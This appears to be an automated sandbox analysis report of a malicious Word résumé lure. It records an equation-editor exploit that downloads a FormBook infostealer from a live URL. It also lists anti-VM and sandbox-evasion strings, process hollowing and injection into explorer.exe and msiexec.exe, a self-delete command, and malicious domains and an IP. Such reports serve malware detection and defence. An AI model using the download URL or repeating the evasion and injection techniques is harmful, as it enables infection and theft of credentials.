          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drStream path '_1696858091/equatIoN naTivE' entropy: 7.99604139076 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 4.2.seasonhd72463.exe.25c09b0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: seasonhd72463.exe PID: 1812, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2564Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe TID: 1444Thread sleep time: -33027s >= -30000s
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe TID: 1232Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 1268Thread sleep time: -38000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeThread delayed: delay time: 33027
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeThread delayed: delay time: 922337203685477
          Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.443051975.000000000457A000.00000004.00000001.sdmpBinary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.443051975.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.443051975.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.510337596.000000000457A000.00000004.00000001.sdmpBinary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idechJ
          Source: explorer.exe, 00000006.00000000.438642662.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.510449681.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009726F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025226F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.lenovoidc.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: B50000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeMemory written: C:\Users\user\AppData\Roaming\seasonhd72463.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeThread register set: target process: 1764
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exe
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeProcess created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe'
          Source: explorer.exe, 00000006.00000000.425645466.0000000000750000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679519269.0000000000B70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.425645466.0000000000750000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679519269.0000000000B70000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.425645466.0000000000750000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679519269.0000000000B70000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeQueries volume information: C:\Users\user\AppData\Roaming\seasonhd72463.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information41DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 510259 Sample: C.V_Job Request.doc Startdate: 27/10/2021 Architecture: WINDOWS Score: 100 48 Multi AV Scanner detection for domain / URL 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 15 other signatures 2->54 10 EQNEDT32.EXE 11 2->10         started        15 WINWORD.EXE 291 20 2->15         started        process3 dnsIp4 40 binatonezx.tk 2.56.59.211, 49165, 80 GBTCLOUDUS Netherlands 10->40 32 C:\Users\user\AppData\...\seasonhd72463.exe, PE32 10->32 dropped 34 C:\Users\user\AppData\...\seasonzx[1].exe, PE32 10->34 dropped 70 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->70 17 seasonhd72463.exe 1 5 10->17         started        36 ~WRF{4A35DA17-E94D...C-120A276E213C}.tmp, Composite 15->36 dropped file5 signatures6 process7 signatures8 42 Multi AV Scanner detection for dropped file 17->42 44 Tries to detect virtualization through RDTSC time measurements 17->44 46 Injects a PE file into a foreign processes 17->46 20 seasonhd72463.exe 17->20         started        process9 signatures10 56 Modifies the context of a thread in another process (thread injection) 20->56 58 Maps a DLL or memory area into another process 20->58 60 Sample uses process hollowing technique 20->60 62 Queues an APC in another process (thread injection) 20->62 23 explorer.exe 20->23 injected process11 dnsIp12 38 www.lenovoidc.com 23->38 64 System process connects to network (likely due to code injection or exploit) 23->64 27 msiexec.exe 23->27         started        signatures13 process14 signatures15 66 Modifies the context of a thread in another process (thread injection) 27->66 68 Maps a DLL or memory area into another process 27->68 30 cmd.exe 27->30         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          C.V_Job Request.doc51%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp100%AviraEXP/CVE-2017-11882.Gen
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exe23%ReversingLabsByteCode-MSIL.Infostealer.Heye
          C:\Users\user\AppData\Roaming\seasonhd72463.exe23%ReversingLabsByteCode-MSIL.Infostealer.Heye

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.seasonhd72463.exe.59d818.2.unpack100%AviraHEUR/AGEN.1104764Download File
          5.0.seasonhd72463.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.seasonhd72463.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.seasonhd72463.exe.380000.0.unpack100%AviraHEUR/AGEN.1104764Download File
          7.0.msiexec.exe.b50000.0.unpack100%AviraHEUR/AGEN.1104764Download File
          5.2.seasonhd72463.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.seasonhd72463.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.msiexec.exe.b50000.0.unpack100%AviraHEUR/AGEN.1104764Download File

          Domains

          SourceDetectionScannerLabelLink
          binatonezx.tk15%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://go.microsoft.c0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://binatonezx.tk/seasonzx.exe100%Avira URL Cloudmalware
          www.agentpathleurre.space/s18y/0%Avira URL Cloudsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          binatonezx.tk
          		2.56.59.211
          		truetrueunknown
          www.lenovoidc.com
          		unknown
          		unknowntrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://binatonezx.tk/seasonzx.exetrue
            • Avira URL Cloud: malware
            		unknown
            www.agentpathleurre.space/s18y/true
            • Avira URL Cloud: safe
            		low

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.windows.com/pctv.explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpfalse
              		high
              http://investor.msn.comexplorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpfalse
                		high
                http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpfalse
                  		high
                  http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpfalse
                    		high
                    http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEMexplorer.exe, 00000006.00000000.510449681.00000000045D6000.00000004.00000001.sdmpfalse
                      		high
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpfalse
                        		high
                        http://treyresearch.netexplorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000006.00000000.449321006.0000000003DF8000.00000004.00000001.sdmpfalse
                          		high
                          http://www.collada.org/2005/11/COLLADASchema9Doneseasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmpfalse
                            		high
                            http://java.sun.comexplorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.msn.com/de-de/?ocid=iehp_2P&explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.seasonhd72463.exe, 00000004.00000002.425810745.0000000005060000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447079678.0000000001BE0000.00000002.00020000.sdmpfalse
                                		high
                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.510496452.000000000460B000.00000004.00000001.sdmpfalse
                                  		high
                                  http://investor.msn.com/explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpfalse
                                    		high
                                    http://www.msn.com/?ocid=iehpexplorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmpfalse
                                        		high
                                        http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        http://go.microsoft.cseasonhd72463.exe, 00000004.00000002.423882111.0000000000814000.00000004.00000020.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.%s.comPAseasonhd72463.exe, 00000004.00000002.425810745.0000000005060000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447079678.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679548263.0000000001F70000.00000002.00020000.sdmpfalse
                                        • URL Reputation: safe
                                        		low
                                        http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpfalse
                                          		high
                                          http://www.msn.com/de-de/?ocid=iehpT2P&explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpfalse
                                            		high
                                            https://support.mozilla.orgexplorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpfalse
                                              		high
                                              http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.509688161.0000000003E50000.00000002.00020000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              2.56.59.211
                                              		binatonezx.tkNetherlands
                                              		395800GBTCLOUDUStrue

                                              General Information

                                              Joe Sandbox Version:33.0.0 White Diamond
                                              Analysis ID:510259
                                              Start date:27.10.2021
                                              Start time:16:41:26
